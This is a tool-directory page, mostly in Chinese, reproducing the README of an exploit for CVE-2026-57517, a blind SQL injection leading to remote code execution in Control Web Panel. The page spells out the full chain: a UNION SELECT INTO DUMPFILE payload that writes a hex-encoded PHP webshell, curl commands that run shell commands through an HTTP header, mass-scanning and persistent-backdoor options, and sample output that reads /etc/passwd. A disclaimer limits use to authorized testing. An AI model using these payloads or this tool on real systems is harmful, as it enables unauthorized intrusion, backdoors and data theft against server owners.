Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-57517 — 💉 针对 Control Web Panel (CWP) ≤ 0.9.8.1224 的盲SQL注入 → RCE 漏洞利用 — userRes POST → INTO DUMPFILE → cwpsvc shell | Kitploit
工具/GitHubGitHub/shinthink/cve-2026-57517
漏洞扫描器漏洞利用Web应用程序漏洞利用渗透测试红队远程访问工具Payload 开发
GitHubshinthink/cve-2026-57517

CVE-2026-57517

💉 针对 Control Web Panel (CWP) ≤ 0.9.8.1224 的盲SQL注入 → RCE 漏洞利用 — userRes POST → INTO DUMPFILE → cwpsvc shell

查看仓库
1192个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-57517 — Control Web Panel 盲注 SQL 注入 → RCE

Python CVE CVSS License

Control Web Panel ≤ 0.9.8.1224 — 盲注 SQL 注入至远程代码执行

端口 2083 → userRes POST → INTO DUMPFILE → 端口 2031 WebShell → cwpsvc



🔴 漏洞概述

CVE-2026-57517 是 Control Web Panel (CWP) 版本 ≤ 0.9.8.1224 中存在的一个严重的未认证盲注 SQL 注入漏洞。用户面板端点的 userRes POST 参数在被拼接到 SQL 查询之前未经过滤。查询以 MySQL root 权限执行——该权限拥有全局 FILE 权限——从而允许攻击者通过 INTO DUMPFILE 写入任意文件。

典型的利用链会将 PHP WebShell 部署到 Web 可访问的 Roundcube 日志目录,并以 cwpsvc 服务账户身份实现远程代码执行。

字段详情
CVECVE-2026-57517
CVSS9.8(严重)— CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
类型CWE-89 — 未认证盲注 SQL 注入
受影响版本Control Web Panel ≤ 0.9.8.1224
修复版本0.9.8.1225
披露日期2026 年 7 月 1 日
研究人员Egidio Romano(Karma In Security)
PoC公开 — KIS-2026-12

📦 安装

git clone https://github.com/shinthink/CVE-2026-57517.git
cd CVE-2026-57517
pip install -r requirements.txt

📖 用法

# Single target (auto-detect username)
python cve_2026_57517.py -t 192.168.1.100

# Single target with known username
python cve_2026_57517.py -t 192.168.1.100 -u cwpsvc

# Mass scan
python cve_2026_57517.py -f targets.txt -o live.txt

# Interactive shell
python cve_2026_57517.py -t target.com --rce -u cwpsvc

# Persistent backdoor (no auto-cleanup)
python cve_2026_57517.py -t target.com --no-cleanup
  -t, --target      Single target host
  -f, --file        File with targets (one per line)
  -u, --username    CWP username (skips auto-detection)
  -o, --output      Live TXT output file
  --json            JSON report file
  --threads         Concurrent workers (default: 20)
  --timeout         Request timeout seconds (default: 15)
  --no-cleanup      Leave shells on target
  --rce             Interactive shell mode
  -v, --verbose     Verbose output

🧪 概念验证(PoC)

场景 1:批量扫描

$ python cve_2026_57517.py -f targets.txt -o live.txt -v
────────────────────────────────────────────────────────────
  CVE-2026-57517 | 5 targets | 20 threads
  Cleanup: yes
  Live TXT: live.txt
────────────────────────────────────────────────────────────

  ✅ 192.168.10.100:2083  [rce_confirmed]  18.2s
     User  : admin
     Shell : https://192.168.10.100:2031/roundcube/logs/cwp_a3f2b9c1d8e4.php
     RCE   : uid=1001(cwpsvc) gid=1001(cwpsvc) groups=1001(cwpsvc)
             cwp-prod-01.example.com
     whoami: cwpsvc

  ⚠️ 192.168.10.200:2083  [sqli_failed]  12.1s
     User  : cwpsvc
     Error : SQL injection failed — target may be patched or path not writable

  · 192.168.10.50:2083  [not_cwp]  2.3s

==================================================
  SCAN SUMMARY
==================================================
  Total      : 5
  ✅ RCE      : 2
  ⚠️  SQLi Fail : 1
  🔍 No User  : 1
  ·  Not CWP  : 1
==================================================

场景 2:交互式 Shell

$ python cve_2026_57517.py -t target.com --rce -u admin
  CWP Interactive Shell — target.com
  Type 'exit' to quit, 'cleanup' to remove shell

cwp$ id
uid=1001(cwpsvc) gid=1001(cwpsvc) groups=1001(cwpsvc)

cwp$ hostname
cwp-prod-01

cwp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
cwpsvc:x:1001:1001::/home/cwpsvc:/bin/bash

cwp$ exit

场景 3:手动复现(curl)

步骤 1 — 确认 CWP 在 2083 端口可达

curl -sk 'https://target.com:2083/' | grep -i 'control web panel\|CWP'

步骤 2 — 验证用户名

curl -sk -o /dev/null -w "%{http_code}" 'https://target.com:2083/admin/'
# 200 = user exists

步骤 3 — 通过 userRes 进行 SQL 注入

Payload 使用 13 列 UNION SELECT,并通过 INTO DUMPFILE 写入十六进制编码的 PHP Shell:

" UNION SELECT 1,0x{HEX_PHP_SHELL},3,4,5,6,7,8,9,10,11,12,13
INTO DUMPFILE '/usr/local/cwpsrv/var/services/roundcube/logs/shell.php' #
# The tool handles hex encoding automatically. Manual equivalent:
PAYLOAD='" UNION SELECT 1,0x3c3f706870206576616c286261736536345f6465636f646528245f5345525645525b22485454505f43225d29293b203f3e,3,4,5,6,7,8,9,10,11,12,13 INTO DUMPFILE '\''/usr/local/cwpsrv/var/services/roundcube/logs/shell.php'\'' #'

curl -sk 'https://target.com:2083/admin/' \
  -d "userRes=$PAYLOAD"

步骤 4 — 通过 WebShell 执行命令(端口 2031)

部署后的 PHP Shell 从 C: HTTP 头中读取命令:

<?php eval(base64_decode($_SERVER['HTTP_C'])); ?>
# Base64-encode: print '___CMD___'; passthru(base64_decode('aWQ=')); print '___CMD___';
PHP=$(echo "print '___CMD___'; passthru(base64_decode('aWQ=')); print '___CMD___';" | base64 -w0)

curl -sk 'https://target.com:2031/roundcube/logs/shell.php' -H "C: $PHP"
# uid=1001(cwpsvc) gid=1001(cwpsvc)

Payload 构成

组件值
SQL 列数13 列 UNION SELECT
PHP Shell<?php eval(base64_decode($_SERVER['HTTP_C'])); ?>
十六进制编码MySQL 0x... 十六进制字面量
写入方式INTO DUMPFILE(以二进制精确写入文件)
目标路径/usr/local/cwpsrv/var/services/roundcube/logs/{uniqid}.php
命令传递HTTP 头 C:,携带 Base64 编码的 PHP
命令执行器passthru(base64_decode('{cmd}'))

⚠️ 免责声明

🚨 仅供教育与授权测试使用

本软件仅用于教育目的和合法的安全研究。其预期使用者包括:

  • 🛡️ 安全专业人员开展授权的渗透测试
  • 🏢 组织审计自身的 CWP 基础设施
  • 🔬 研究人员研究漏洞利用技术
  • 🎓 学生学习 Web 应用安全

❌ 禁止将本软件用于以下用途:

  • 未经明确书面授权访问计算机系统
  • 入侵、破坏或干扰您不拥有的系统
  • 从事任何形式的非法活动

⚖️ 法律声明

未经授权访问计算机系统违反的法律法规包括但不限于:

  • 美国:《计算机欺诈和滥用法》(18 U.S.C. § 1030)
  • 印度尼西亚: UU ITE 法第 30 条和第 46 条(UU No. 11 Tahun 2008 jo. UU No. 1 Tahun 2024)
  • 欧盟:《第 2013/40/EU 号指令》
  • 英国:《1990 年计算机滥用法》

作者对因使用本工具而产生的任何滥用、损害或法律后果不承担任何责任。使用本软件即表示您承认对自己的行为负全部责任,并同意遵守所有适用法律。


📚 参考资料

资源链接
Karma In Security 安全公告KIS-2026-12
原始 PoCCVE-2026-57517.php
全面披露SecLists
OpenCVECVE-2026-57517
CWP 更新日志control-webpanel.com

⚡ 为安全研究与教育而构建 ⚡

本项目与 Control Web Panel 或 Apache 软件基金会无任何关联。

下载工具